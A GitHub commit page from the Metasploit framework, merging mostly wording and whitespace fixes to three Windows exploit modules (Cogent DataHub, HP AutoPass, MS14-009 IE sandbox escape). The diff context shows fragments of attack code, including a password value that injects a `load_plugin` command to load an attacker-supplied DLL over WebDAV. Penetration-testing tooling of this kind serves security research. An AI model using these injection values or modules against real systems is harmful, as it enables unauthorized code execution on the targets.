Skip to content

Commit bfc6c87

Browse files
committed
Land rapid7#3486, release fixes
Now with more @wchen-r7!
2 parents bf9c64d + 21f6e7b commit bfc6c87

File tree

3 files changed

+12
-13
lines changed

3 files changed

+12
-13
lines changed

modules/exploits/windows/http/cogent_datahub_command.rb

Lines changed: 6 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,8 @@ def initialize
2222
makes insecure use of the datahub_command function with user controlled
2323
data, allowing execution of arbitrary datahub commands and scripts. This
2424
module has been tested successfully with Cogent DataHub 7.3.4 on
25-
Windows 7 SP1.
25+
Windows 7 SP1. Please also note that after exploitation, the remote service
26+
will most likely hang and restart manually.
2627
},
2728
'Author' => [
2829
'John Leitch', # Vulnerability discovery
@@ -50,7 +51,7 @@ module has been tested successfully with Cogent DataHub 7.3.4 on
5051
register_options(
5152
[
5253
OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/']),
53-
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on ' +
54+
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on ' +
5455
'(do not change)', 80 ]),
5556
OptInt.new('WEBDAV_DELAY', [ true, 'Time that the HTTP Server will ' +
5657
'wait for the payload request', 20]),
@@ -374,7 +375,7 @@ def send_injection(dll)
374375
'vars_post' =>
375376
{
376377
'username' => rand_text_alpha(3 + rand(3)),
377-
'password' => "#{rand_text_alpha(3 + rand(3))}\")" +
378+
'password' => "#{rand_text_alpha(3 + rand(3))}\")" +
378379
"(load_plugin \"#{dll}\" 1)(\""
379380
}
380381
}, 1)
@@ -414,7 +415,7 @@ def exploit
414415
@exploit_unc = "\\\\#{@myhost}\\"
415416

416417
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
417-
fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' +
418+
fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' +
418419
'URIPATH=/')
419420
end
420421

@@ -439,7 +440,7 @@ def exploit
439440
print_error("#{peer} - Unexpected answer")
440441
end
441442
else
442-
fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' +
443+
fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' +
443444
'\\\\host\\shared_folder\\base_name.dll')
444445
end
445446
end

modules/exploits/windows/http/hp_autopass_license_traversal.rb

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -17,9 +17,9 @@ def initialize(info = {})
1717
'Description' => %q{
1818
This module exploits a code execution flaw in HP AutoPass License Server. It abuses two
1919
weaknesses in order to get its objective. First, the AutoPass application doesn't enforce
20-
authentication in the CommunicationServlet component. On the other hand, it's possible to
21-
abuse a directory traversal when uploading files thorough the same component, allowing to
22-
upload an arbitrary payload embedded in a JSP. The module has been tested successfully on
20+
authentication in the CommunicationServlet component. Seond, it's possible to abuse a
21+
directory traversal when uploading files thorough the same component, allowing to upload
22+
an arbitrary payload embedded in a JSP. The module has been tested successfully on
2323
HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.
2424
},
2525
'Author' =>

modules/exploits/windows/local/ms14_009_ie_dfsvc.rb

Lines changed: 3 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -32,11 +32,9 @@ def initialize(info={})
3232
super( update_info( info,
3333
'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape',
3434
'Description' => %q{
35-
This module abuses a process creation policy in the Internet Explorer Sandbox which allows
36-
to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
37-
exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
38-
Level. Further interaction with the component allows to escape the Enhanced Protected Mode
39-
and execute arbitrary code with Medium Integrity.
35+
This module abuses a process creation policy in Internet Explorer's sandbox, specifically
36+
in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the
37+
Enhanced Protected Mode, and execute code with Medium Integrity.
4038
},
4139
'License' => MSF_LICENSE,
4240
'Author' =>

0 commit comments

Comments
 (0)